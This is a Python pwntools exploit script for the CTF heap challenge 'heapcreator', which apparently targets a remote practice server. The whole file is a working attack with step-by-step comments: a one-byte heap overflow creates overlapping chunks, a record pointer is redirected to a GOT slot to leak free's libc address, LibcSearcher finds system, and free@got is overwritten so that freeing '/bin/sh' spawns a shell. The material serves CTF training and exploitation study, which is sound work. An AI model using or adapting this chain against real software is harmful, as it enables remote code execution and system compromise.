from pwn import *
from LibcSearcher import *

# Global pwntools settings for this exploit: x86-64 word size for p64/u64,
# and 'debug' so every byte sent to / received from the tube is echoed
# while the chain is being developed (lower to 'info' for a quiet run).
context(arch='amd64', log_level='debug')
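def add(size, contet):
    """Menu option 1: create a record of `size` bytes holding `contet`.

    Talks over the module-level tube `p`. `size` is an int and is sent as
    its decimal text; `contet` must already be bytes. Everything sent to
    the tube is bytes so the helper does not depend on pwntools' implicit
    str encoding (identical on the wire for ASCII, explicit here).
    """
    p.sendafter(b"Your choice :", b'1')
    p.sendafter(b"Size of Heap :", str(size).encode())
    # Prompt has no space before the colon here (unlike edit's prompt).
    p.sendafter(b"Content of heap:", contet)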
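def edit(index, contet):
    """Menu option 2: overwrite the content of record `index` with `contet`.

    Uses the module-level tube `p`. `index` is sent as decimal text and
    `contet` must be bytes; how many bytes the binary actually reads is
    bounded by the record's stored size, not by len(contet).
    """
    p.sendafter(b"Your choice :", b'2')
    p.sendafter(b"Index :", str(index).encode())
    p.sendafter(b"Content of heap :", contet)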
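def show(index):
    """Menu option 3: ask the binary to print record `index`.

    Only sends the request on the module-level tube `p`; the caller is
    responsible for reading the printed content (e.g. `p.recvuntil`).
    """
    p.sendafter(b"Your choice :", b'3')
    p.sendafter(b"Index :", str(index).encode())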
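def dele(index):
    """Menu option 4: free record `index` (its content and its struct).

    Uses the module-level tube `p`. NOTE(review): this is the one helper
    that sends the index with a trailing newline (sendlineafter); the other
    helpers use sendafter. Kept as in the original -- presumably the index
    parser tolerates the newline, confirm against the binary before
    "fixing" it either way.
    """
    p.sendafter(b"Your choice :", b'4')
    p.sendlineafter(b"Index :", str(index).encode())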
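# --- Exploit chain (heapcreator) ---------------------------------------------
# 1. A one-byte overflow out of record 0 rewrites the size byte of the chunk
#    that follows it, so freeing record 1 releases an enlarged chunk.
# 2. Re-allocating that chunk gives record 1 a content buffer that overlaps
#    heap metadata; editing it rewrites a record struct's size and content
#    pointer so that index 1 now aliases a GOT slot.
# 3. show(1) leaks the libc address stored in that slot, LibcSearcher
#    identifies the libc build, edit(1) writes system's address into the
#    slot, and freeing record 3 (content "/bin/sh") becomes system("/bin/sh").
# The constants (0x18/0x81/0x21/0x40/0x70) are tied to this binary's record
# layout and the remote glibc's chunk sizes; they are not generic.

# Run as `python3 exp.py LOCAL` to target ./heapcreator instead of the remote
# instance (pwntools turns KEY / KEY=VALUE command-line words into `args`).
if args.LOCAL:
    p = process("./heapcreator")
else:
    p = remote("node4.buuoj.cn", 27274)

# GOT slot that is read and written through the corrupted record. In a
# non-PIE binary this looks like free@got; confirm with `objdump -R ./heapcreator`.
GOT_SLOT = 0x602018

add(0x18, b'a')        # 0: source of the overflow (0x18 usable bytes)
add(0x10, b'b')        # 1: chunk whose size byte gets overwritten
add(0x10, b'c')        # 2: neighbour whose metadata ends up inside the enlarged chunk
add(0x10, b'/bin/sh')  # 3: freeing this later is the system("/bin/sh") trigger

# 0x18 bytes fill record 0's content; the 25th byte (0x81) presumably lands on
# the low byte of the next chunk's size field, turning it into a 0x80 chunk.
edit(0, b'a' * 0x18 + b'\x81')
dele(1)
# A 0x70 request is served from that enlarged chunk, so record 1's new content
# buffer overlaps the chunks that used to follow it.
add(0x70, b'a')
# Rewrite the overlapped region: p64(0)+p64(0x21) looks like a restored 0x20
# chunk header, and p64(0x40)+p64(GOT_SLOT) the {size, content} fields of the
# record struct living there -- presumably index 1's own struct, since the
# show(1)/edit(1) calls below are what dereference it next.
edit(1, 0x10 * b'b' + p64(0) + p64(0x21) + p64(0x40) + p64(GOT_SLOT))

# The binary now prints whatever GOT_SLOT points to: free's libc address.
# Keep the six low bytes of the printed pointer (libc lives at 0x7f........)
# and zero-extend to a full 8-byte word.
show(1)
free_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\0'))
log.info("free@libc   = %#x" % free_addr)

# Identify the remote libc from the leaked address (LibcSearcher may prompt to
# pick between candidate builds), then rebase system on that build. The base
# is logged so a wrong libc match is visible before the GOT is overwritten.
libc = LibcSearcher("free", free_addr)
libc_base = free_addr - libc.dump("free")
system_addr = libc_base + libc.dump("system")
log.info("libc base   = %#x" % libc_base)
log.info("system@libc = %#x" % system_addr)

edit(1, p64(system_addr))  # overwrite the GOT slot with system's address
dele(3)                    # free("/bin/sh") -> system("/bin/sh")
p.interactive()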